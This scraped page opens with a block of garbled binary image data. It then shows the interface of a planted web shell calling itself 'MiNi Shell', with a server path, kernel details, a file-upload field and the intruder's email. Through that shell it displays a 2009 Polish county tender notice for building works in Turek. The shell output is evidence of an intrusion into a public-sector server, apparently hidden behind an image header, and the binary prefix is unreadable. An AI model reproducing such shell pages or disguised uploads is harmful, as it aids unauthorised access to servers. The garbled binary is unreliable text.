JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/33688-N-2009.html

<p class="kh_header"><b>Turek: WYKONANIE ROBÓT BUDOWLANYCH DOTYCZĄCYCH ZMIANY SPOSOBU UŻYTKOWANIA CZĘŚCI PARTERU BUDYNKU SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI ZDROWOTNEJ W TURKU NA POTRZEBY POWIATOWEGO OŚRODKA DOKUMENTACJI GEODEZYJNEJ I KARTOGRAFICZNEHJ ORAZ WYDZIAŁU GEODEZJI, KARTOGRAFII, KATASTRU I GOSPODARKI NIERUCHOMOŚCIAMI STAROSTWA POWIATOWEGO W TURKU</b><br>
<b>Numer ogłoszenia: 33688 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Tureckiego , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 2892360, faks 063 278-83-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.turek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH DOTYCZĄCYCH ZMIANY SPOSOBU UŻYTKOWANIA CZĘŚCI PARTERU BUDYNKU SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI ZDROWOTNEJ W TURKU NA POTRZEBY POWIATOWEGO OŚRODKA DOKUMENTACJI GEODEZYJNEJ I KARTOGRAFICZNEHJ ORAZ WYDZIAŁU GEODEZJI, KARTOGRAFII, KATASTRU I GOSPODARKI NIERUCHOMOŚCIAMI STAROSTWA POWIATOWEGO W TURKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dotyczących zmiany sposobu użytkowania części parteru budynku Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Turku na potrzeby Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej oraz Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Turku.

2. Roboty do wykonania w ramach zamówienia:
W ZAKRESIE ROBÓT BUDOWLANYCH:
1. Roboty rozbiórkowe obejmujące rozebranie elementów istniejących budynków i obiektów terenowych zgodnie z dokumentacją projektową.
2. Wykonanie ścian wewnętrznych działowych, ścian wewnętrznych z pustaków ceramicznych, wykonanie słupów i ścian zewnętrznych wraz z przygotowaniem i wykonaniem ich fundamentów(roboty ziemne fundamentowe, deskowanie tradycyjne do konstrukcji monolitycznych betonowych lub żelbetowych, betonowanie stóp fundamentowych i słupów żelbetowych, belek stropowych, podciągów i wieńcy), założenie belek stalowych z osiatkowaniem - podciągi oraz wykonanie domurówek w otworach okiennych,
3. Wykonanie nowego pokrycia dachowego. Wykonanie dachu obejmuje wykonanie warstw na stropie: warstwy wyrównawcze z zaprawy cementowej, warstwy podkładu z ubitych materiałów sypkich-kruszywo lekkie, paraizolacji, ocieplenia z wełny mineralnej, pokrycia płytami falistymi-warstwa odpowietrzająca, podkładu betonowego beton zwykły-warstwa dociskowa, pokrycie dachu papą termozgrzewalną (wierzchniego krycia + podkładowa), jak również wykonanie stosownego wykończenia: obróbka blacharska z blachy stalowej ocynkowanej np. kominów, wyposażenie dachu w rynny i rury spustowe z tworzyw sztucznych.
4. Przygotowanie podłoża i wykonanie posadzki w pomieszczeniach sanitarnych (łazienki) i pomieszczeniu socjalny, z płytek ceramicznych antypoślizgowych, pozostałe pomieszczenia-wykładzina rulonowa spawana, typu homogenicznego.
5. Wykonanie stolarki drzwiowej i okiennej.
6. Roboty wykończeniowe wewnętrzne. Zakres robót obejmuje wykonanie:
a) ściany - tynki na ścianach,
b) sufity
7. Roboty elewacyjne. Zakres robót obejmuje wykonanie: schodów żelbetowych, stopni betonowych na gotowym podłożu, uzupełnienie tynków zewnętrznych zwykłych kategorii II, malowany farbami silikatowymi, w części elewacji zastosować okładziny elewacyjne drewnopodobne.
8. Roboty drogowe. Zakres prac obejmuje wykonanie posadzek zewnętrznych. Wykończeniowe prace zewnętrzne obejmują także wykonania elementów utwardzonych podłoża takich jak dojścia, chodniki i komunikacja wewnętrzna z kostki poz-brukowej.
W ZAKRESIE INSTALACJI ELEKTROENERGETYCZNYCH:
Prowadzenie robót związanych z montażem instalacji elektrycznej obejmuje:
- Tablice elektryczne TE i TK,
- Wewnętrzną linię zasilającą,
- Instalację oświetlenia podstawowego,
- Instalację oświetlenia awaryjnego,
- Instalację gniazd wtyczkowych ogólnych,
- Instalację zasilania komputerów,
- Zasilanie wentylacji i klimatyzacji,
- Ochronę przeciwpożarową,
- Ochronę przed przepięciami,
Do zasilania projektowanej instalacji wykorzystać istniejący wlz z rozdzielnicy głównej budynku.
W ZAKRESIE INSTALACJI WODOCIĄGOWEJ:
Wykonanie prac obejmuje wykonanie wszystkich czynności umożliwiających montaż instalacji wewnętrznych, ich uzbrojenia i armatury, a także niezbędne dla właściwego wykonania tej instalacji roboty tymczasowe oraz prace towarzyszące. Wykonanie prac obejmuje: montaż instalacji wody zimnej, montaż instalacji wody ciepłej, oraz montaż instalacji cyrkulacji.
W ZAKRESIE INSTALACJI CENTRALNEGO OGRZEWANIA:
Prowadzenie robót w zakresie wykonania instalacji centralnego ogrzewania dla adaptacji i modernizacji części parteru budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Turku na potrzeby Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej oraz Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Turku.
W ZAKRESIE INSTALACJI KANALIZACJI SANITARNEJ:
Wykonanie robót obejmuje wszystkie czynności umożliwiające montaż instalacji wewnętrznych przyborów, a także niezbędne dla właściwego wykonania tej instalacji roboty tymczasowe oraz prace towarzyszące.
W ZAKRESIE INSTALACJI WENTYLACJI:
Wykonanie prac obejmuje wszystkie czynności umożliwiające montaż instalacji wentylacji mechanicznej.	
W ZAKRESIE INSTALACJI PRZYWOŁAWCZEJ.
W ZAKRESIE SYSTEMU SYGNALIZACJI WŁAMANIA.
W ZAKRESIE SYSTEMU SYGNALIZACJI POŻARU. 
W ZAKRESIE SIECI STRUKTURALNEJ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.13.00-1, 45.26.25.00-6, 45.26.14.10-1, 45.42.11.00-5, 45.40.00.00-1, 45.32.10.00-3, 45.23.31.40-2, 45.31.11.00-1, 45.31.10.00-0, 45.30.00.00-0, 45.31.21.00-8, 45.31.22.00-9, 45.31.41.20-8, 45.31.43.10-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający określa kwotę wadium w wysokości 15 000,00 PLN (słownie: piętnaście tysięcy złotych zero groszy)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.2.1 Zgodnie z art. 22 ust 1 Ustawy, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
III.2.2 Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
a) Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać, że jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi. Ocena spełniania tego warunku nastąpi na podstawie przedstawionego przez wykonawcę dokumentu, o którym mowa w punkcie III.2.5.
b) Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobą posiadającą wymagane uprawnienia zawodowe tj. uprawnienia kierownika budowy specjalności konstrukcyjno-budowlanej i posiadającą aktualny wpis do Izby Inżynierów Budownictwa lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osoby posiadającej uprawnienia kierownika budowy specjalności konstrukcyjno-budowlanej i posiadającej aktualny wpis do Izby Inżynierów Budownictwa. Ocena spełniania tego warunku nastąpi na podstawie przedstawionych przez wykonawcę dokumentów, o których mowa w punkcie III.2.6.
c) Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 300 000,00 zł. Ocena spełniania tego warunku nastąpi na podstawie przedstawionego przez wykonawcę dokumentu, o którym mowa w punkcie III.2.7.
III.2.3 Sposób dokonywania oceny spełnienia tych warunków:
na potwierdzenie spełnienia ww. warunków wykonawca przedłoży wraz z ofertą oświadczenia i dokumenty wymienione w punktach: III.2.5-III.2.8.
III.2.4 Ocena spełniania warunków wymaganych od wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.2.5 W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda, następujących dokumentów:
- aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
(oryginał/y lub kopia/e poświadczona/e za zgodność z oryginałem przez wykonawcę);
III.2.6 W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda, następujących dokumentów:
- stwierdzających, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Zamawiający wymaga, by wykonawca dołączył do oferty uprawnienie kierownika budowy specjalności konstrukcyjno-budowlanej oraz aktualny wpis tej osoby do Izby Inżynierów Budownictwa (minimum jednej osoby).
(oryginał/y lub kopia/e poświadczona/e za zgodność z oryginałem przez wykonawcę);
III.2.7 W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez  wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
- polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, wystawionej/ego na kwotę nie niższą niż 300 000,00 zł.
 (oryginał/y lub kopia/e poświadczona/e za zgodność z oryginałem przez wykonawcę);
Termin, na jaki została zawarta polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności nie powinien być krótszy niż termin realizacji zamówienia. Jeżeli okaże się, że termin ważności ww. dokumentu jest krótszy niż termin realizacji zamówienia wykonawca przed zawarciem umowy zobowiązany jest do przedłużenia terminu ważności tego dokumentu lub zawarcia nowej polisy albo innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
III.2.8 Każdy wykonawca poza ww. dokumentami stosownie do zapisu art. 44 ustawy składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.turek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Turku,
ul. Kaliska 59,
62-700 Turek,
Wydział Rozwoju Społeczno-Gospodarczego,
Pani Aneta Sochacka, pok. nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2009 godzina 11:00, miejsce: Starostwo Powiatowe w Turku,
ul. Kaliska 59,
62-700 Turek,
Punkt Obsługi Interesanta (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com